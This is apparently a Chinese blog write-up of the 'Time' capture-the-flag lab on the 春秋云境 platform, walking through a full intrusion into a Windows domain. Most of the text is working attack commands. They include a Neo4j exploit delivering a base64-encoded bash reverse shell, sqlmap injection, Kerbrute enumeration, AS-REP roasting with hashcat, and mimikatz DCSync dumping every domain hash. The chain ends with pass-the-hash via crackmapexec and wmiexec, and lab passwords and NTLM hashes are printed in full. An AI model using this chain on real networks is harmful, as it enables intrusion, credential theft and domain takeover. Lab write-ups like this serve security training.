春秋云境 - - Time靶场

0e1G7

已于 2024-02-27 17:14:48 修改

阅读量1.2k

点赞数 25

分类专栏：春秋云境渗透笔记文章标签：经验分享安全网络安全安全威胁分析

于 2024-02-27 16:34:12 首次发布

本文链接：https://blog.csdn.net/qq_44640313/article/details/136325955

版权

渗透笔记同时被 2 个专栏收录

6 篇文章 0 订阅

订阅专栏

春秋云境

2 篇文章 0 订阅

订阅专栏

感谢苟哥，没他还真做不了，挂他博客供大家学习，su✌

fushulingのblog – 狗and猫的安全笔记

flag01

先扫内网

fscan.exe -h 39.99.233.234 -p 1-65535

7474、7687端口可以看出是neo4j（CVE），有个Neo4j Browser，存在nday，直接执行命令（base64编码中的ip和端口改成自己vps的ip和相应的端口）

java -jar ./rhino_gadget.jar rmi://39.99.151.101:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC9wb3J0IDA+JjE=}|{base64,-d}|{bash,-i}"

vps上监听端口

nc -lvvp 9999  #之间在base64中开放了9999端口

get shell

找到flag01

find / -name flag*

flag02

ifconfig查看一下，内网网段172.22.6.0/24

将frp和fscan传入tmp目录下（不是tmp的话没有权限）

【A机有文件要通过wget上传到B机，则需要在A机开启http服务】

A机

python3 -m http.server 80

B机

wget http://vps:80/root/frp/frpc

fscan开扫

分析得到下面的结果

172.22.6.12 域控

172.22.6.25 域内机器

172.22.6.36 当前机器

172.22.6.38 某后台登录界面

开代理访问172.22.6.38，可参考我苟哥的博客内网代理搭建 – fushulingのblog

是个web服务，然后需要我们抓包分析一下，burpsuite本身就可以建立socks5代理，非常方便，所以我们就可以抓代理之后的包了

抓的包：


POST /index.php HTTP/1.1
Host: 172.22.6.38
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://172.22.6.38/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: http://172.22.6.38
Connection: close
Upgrade-Insecure-Requests: 1

username=admin&password=123456

直接sqlmap一把梭，发现存在时间盲注，再爆破--current-db、table

flag03

把users表中的用户名收集成字典username.txt，将下面命令生成的csv粘贴到usersname.txt里

proxychains sqlmap -r kkk.txt --dump -D oa_db -T oa_users -C email

域内用户枚举：

当主机不在域内时，我们可以通过域内用户枚举来探测域内的用户。

我们可以使用Kerbrute工具进行探测。

在kerberos的AS-REQ认证中当cname值中的用户不存在时返回包提示KDC_ERR_C_PRINCIPAL_UNKNOWN，所以当我们没有域凭证时，可以通过Kerberos pre-auth从域外对域用户进行用户枚举

将kerbrute_linux_386 userenum，username.txt上传到最开始的主机上

kerbrute_windows_amd64.exe userenum --dc 10.1.1.1 -d hack.com 1.txt
                                        域控ip        域名       字典

chmod +x kerbrute_linux_386
./kerbrute_linux_386 userenum --dc 172.22.6.12 -d xiaorang.lab usersname.txt -t 10

将枚举出来的用户做成字典result.txt

weixian@xiaorang.lab
gaiyong@xiaorang.lab
shuzhen@xiaorang.lab
wengbang@xiaorang.lab
xiqidi@xiaorang.lab
xuanjiang@xiaorang.lab
yuanchang@xiaorang.lab
lvhui@xiaorang.lab
wenbo@xiaorang.lab
zhenjun@xiaorang.lab
jinqing@xiaorang.lab
weixian@xiaorang.lab
weicheng@xiaorang.lab
yangju@xiaorang.lab
haobei@xiaorang.lab
jizhen@xiaorang.lab
jingze@xiaorang.lab
rubao@xiaorang.lab
liangliang@xiaorang.lab
tangshun@xiaorang.lab
zhaoxiu@xiaorang.lab
chouqian@xiaorang.lab
beijin@xiaorang.lab
xiyi@xiaorang.lab
jicheng@xiaorang.lab
qiyue@xiaorang.lab
chenghui@xiaorang.lab
yanglang@xiaorang.lab
chebin@xiaorang.lab
jihuan@xiaorang.lab
pengyuan@xiaorang.lab
duanmuxiao@xiaorang.lab
fusong@xiaorang.lab
yifu@xiaorang.lab
gaijin@xiaorang.lab
hongzhi@xiaorang.lab
luwan@xiaorang.lab
zhufeng@xiaorang.lab
tangrong@xiaorang.lab
dongcheng@xiaorang.lab
huabi@xiaorang.lab
lili@xiaorang.lab
rangsibo@xiaorang.lab
lianhuangchen@xiaorang.lab
wohua@xiaorang.lab
haoguang@xiaorang.lab
wenshao@xiaorang.lab
langying@xiaorang.lab
diaocai@xiaorang.lab
lianggui@xiaorang.lab
manxue@xiaorang.lab
baqin@xiaorang.lab
louyou@xiaorang.lab
chengqiu@xiaorang.lab
wenbiao@xiaorang.lab
maqun@xiaorang.lab
weishengshan@xiaorang.lab
chuyuan@xiaorang.lab
wenliang@xiaorang.lab
yulvxue@xiaorang.lab
luyue@xiaorang.lab
lezhong@xiaorang.lab
ganjian@xiaorang.lab
guohong@xiaorang.lab
sheweiyue@xiaorang.lab
pangzhen@xiaorang.lab
dujian@xiaorang.lab
lidongjin@xiaorang.lab
yexing@xiaorang.lab
hongqun@xiaorang.lab
maoda@xiaorang.lab
zhangxin@xiaorang.lab
qiaomei@xiaorang.lab
ganjian@xiaorang.lab

然后进行AS_REP Roasting攻击：

AS_REP Roasting是一种对用户账户进行离线爆破的方式，需要关闭预身份验证，而此选项又是默认开启的，所以有一定的限制，默认开启的预身份验证是会记录密码错误次数来防止爆破的，关闭预身份验证后，在进行AS_REQ之后的时候，KDC不会进行任何验证就将TGT和用该用户Hash加密的Login Session Key返回，由于AS_REP的数据包中Login Session Key的是由用户Hash进行加密的，因此，可以对获取到的用户Hash加密的Login Session Key进行离线爆破，得到对应用户的明文密码
对于域用户，如果设置了选项Do not require Kerberos preauthentication(不要求Kerberos预身份认证)，此时向域控制器的88端口发送AS-REQ请求，对收到的AS-REP内容重新组合，能够拼接成”Kerberos 5 AS-REP etype 23”(18200)的格式，接下来可以使用hashcat或是john对其破解，最终获得该用户的明文口令

因为当前主机不在域内，所以使用impacket的GetNPUsers.py进行攻击

利用BloodHound与Impacket进行域渗透实战 - FreeBuf网络安全行业门户

proxychains python3 GetNPUsers.py -dc-ip 172.22.6.12 -usersfile username.txt xiaorang.lab/

得到2个用户

使用hashcat解密

hashcat -m 18200 --force -a 0 '$krb5asrep$23$zhangxin@XIAORANG.LAB:e414f4692a6b1d0905e8ed118747ac6e$95ec406c7cdae081a496fe8009a23e684f0612d0632c903e1b34ce66275421c5d0f8125c8e651bf93ddee83bab492833c6af3316177096000e7e302359774ab66f05c254ad9c61ba9407756681e532c031f65961571469d15a08a069ea0ab26d38d876c2808055c0724c9b30dcc29ba9e62d56d8f697ea29d200f3c58bd107e8f39e16d34aa76dcb26d58e7d7e59a1d3160d249451a73fe6ba1a0d09d4a5210f2b6aeb09cf979a0ad51345244b21769878652f5c88223c4ed6648c650413bc31192e835cf74f274b20604a8e9ad3db6ec6e28f7b24452eaf7c456a7e4282e1bba9ffddc43915cfd1349c56a0' /usr/share/wordlists/rockyou.txt

获得账号和密码

zhangxin@XIAORANG.LAB:strawberry

rdp随便试试，登录了172.22.6.25，然后查看一下用户

xiaorang.lab\ZHANGXIN
strawberry

看别人说这里有理由怀疑是开了Windows 自动登录，反正可以抓密码了

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

DefaultUserName    REG_SZ    yuxuan
DefaultPassword    REG_SZ    Yuxuan7QbrgZ3L
DefaultDomainName    REG_SZ    xiaorang.lab

换这个账号登了一下，用BloodHound分析域内关系，发现这个用户滥用了SID历史功能(SIDHistory是一个为支持域迁移方案而设置的属性，当一个对象从一个域迁移到另一个域时，会在新域创建一个新的SID作为该对象的objectSid，在之前域中的SID会添加到该对象的sIDHistory属性中，此时该对象将保留在原来域的SID对应的访问权限)，借一张别人的图：

我们就可以通过这个滥用直接攻击DC了，因为我们保留域管理员的访问权限了，所以直接dump哈希

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"

1103    shuzhen 07c1f387d7c2cf37e0ca7827393d2327
1104    gaiyong 52c909941c823dbe0f635b3711234d2e
1106    xiqidi  a55d27cfa25f3df92ad558c304292f2e
1107    wengbang        6b1d97a5a68c6c6c9233d11274d13a2e
1108    xuanjiang       a72a28c1a29ddf6509b8eabc61117c6c
1109    yuanchang       e1cea038f5c9ffd9dc323daf35f6843b
1110    lvhui   f58b31ef5da3fc831b4060552285ca54
1111    wenbo   9abb7115997ea03785e92542f684bdde
1112    zhenjun 94c84ba39c3ece24b419ab39fdd3de1a
1113    jinqing 4bf6ad7a2e9580bc8f19323f96749b3a
1115    yangju  1fa8c6b4307149415f5a1baffebe61cf
1117    weicheng        796a774eace67c159a65d6b86fea1d01
1118    weixian 8bd7dc83d84b3128bfbaf165bf292990
1119    haobei  045cc095cc91ba703c46aa9f9ce93df1
1120    jizhen  1840c5130e290816b55b4e5b60df10da
1121    jingze  3c8acaecc72f63a4be945ec6f4d6eeee
1122    rubao   d8bd6484a344214d7e0cfee0fa76df74
1123    zhaoxiu 694c5c0ec86269daefff4dd611305fab
1124    tangshun        90b8d8b2146db6456d92a4a133eae225
1125    liangliang      c67cd4bae75b82738e155df9dedab7c1
1126    qiyue   b723d29e23f00c42d97dd97cc6b04bc8
1127    chouqian        c6f0585b35de1862f324bc33c920328d
1128    jicheng 159ee55f1626f393de119946663a633c
1129    xiyi    ee146df96b366efaeb5138832a75603b
1130    beijin  a587b90ce9b675c9acf28826106d1d1d
1131    chenghui        08224236f9ddd68a51a794482b0e58b5
1132    chebin  b50adfe07d0cef27ddabd4276b3c3168
1133    pengyuan        a35d8f3c986ab37496896cbaa6cdfe3e
1134    yanglang        91c5550806405ee4d6f4521ba6e38f22
1135    jihuan  cbe4d79f6264b71a48946c3fa94443f5
1136    duanmuxiao      494cc0e2e20d934647b2395d0a102fb0
1137    hongzhi f815bf5a1a17878b1438773dba555b8b
1138    gaijin  b1040198d43631279a63b7fbc4c403af
1139    yifu    4836347be16e6af2cd746d3f934bb55a
1140    fusong  adca7ec7f6ab1d2c60eb60f7dca81be7
1141    luwan   c5b2b25ab76401f554f7e1e98d277a6a
1142    tangrong        2a38158c55abe6f6fe4b447fbc1a3e74
1143    zhufeng 71e03af8648921a3487a56e4bb8b5f53
1145    dongcheng       f2fdf39c9ff94e24cf185a00bf0a186d
1146    lianhuangchen   23dc8b3e465c94577aa8a11a83c001af
1147    lili    b290a36500f7e39beee8a29851a9f8d5
1148    huabi   02fe5838de111f9920e5e3bb7e009f2f
1149    rangsibo        103d0f70dc056939e431f9d2f604683c
1150    wohua   cfcc49ec89dd76ba87019ca26e5f7a50
1151    haoguang        33efa30e6b3261d30a71ce397c779fda
1152    langying        52a8a125cd369ab16a385f3fcadc757d
1153    diaocai a14954d5307d74cd75089514ccca097a
1154    lianggui        4ae2996c7c15449689280dfaec6f2c37
1155    manxue  0255c42d9f960475f5ad03e0fee88589
1156    baqin   327f2a711e582db21d9dd6d08f7bdf91
1157    chengqiu        0d0c1421edf07323c1eb4f5665b5cb6d
1158    louyou  a97ba112b411a3bfe140c941528a4648
1159    maqun   485c35105375e0754a852cee996ed33b
1160    wenbiao 36b6c466ea34b2c70500e0bfb98e68bc
1161    weishengshan    f60a4233d03a2b03a7f0ae619c732fae
1163    chuyuan 0cfdca5c210c918b11e96661de82948a
1164    wenliang        a4d2bacaf220292d5fdf9e89b3513a5c
1165    yulvxue cf970dea0689db62a43b272e2c99dccd
1166    luyue   274d823e941fc51f84ea323e22d5a8c4
1167    ganjian 7d3c39d94a272c6e1e2ffca927925ecc
1168    pangzhen        51d37e14983a43a6a45add0ae8939609
1169    guohong d3ce91810c1f004c782fe77c90f9deb6
1170    lezhong dad3990f640ccec92cf99f3b7be092c7
1171    sheweiyue       d17aecec7aa3a6f4a1e8d8b7c2163b35
1172    dujian  8f7846c78f03bf55685a697fe20b0857
1173    lidongjin       34638b8589d235dea49e2153ae89f2a1
1174    hongqun 6c791ef38d72505baeb4a391de05b6e1
1175    yexing  34842d36248c2492a5c9a1ae5d850d54
1176    maoda   6e65c0796f05c0118fbaa8d9f1309026
1177    qiaomei 6a889f350a0ebc15cf9306687da3fd34
502     krbtgt  a4206b127773884e2c7ea86cdd282d9c
1178    wenshao b31c6aa5660d6e87ee046b1bb5d0ff79
500     Administrator   04d93ffd6f5f6e4490e0de23f240a5e9
1000    DC-PROGAME$     5c76d177587a06495af3a7494ffb2e1f
1180    yuxuan  376ece347142d1628632d440530e8eed
1181    WIN2019$        91c31e8e8aa3270652c7e1e11fa17b3b
1179    zhangxin        d6c5976e07cdb410be19b84126367e3d

直接把域管理员哈希dump了，所以相当于已经拿下域控了，哈希传递登一下其他两台机器拿一下flag就结束了

smb获得flag03

proxychains crackmapexec smb 172.22.6.25 -u administrator -H04d93ffd6f5f6e4490e0de23f240a5e9 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

flag04

获得域控的shell

proxychains impacket-wmiexec -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 Administrator@172.22.6.12

参考博客：

春秋云境Time-WP【一遍过】-CSDN博客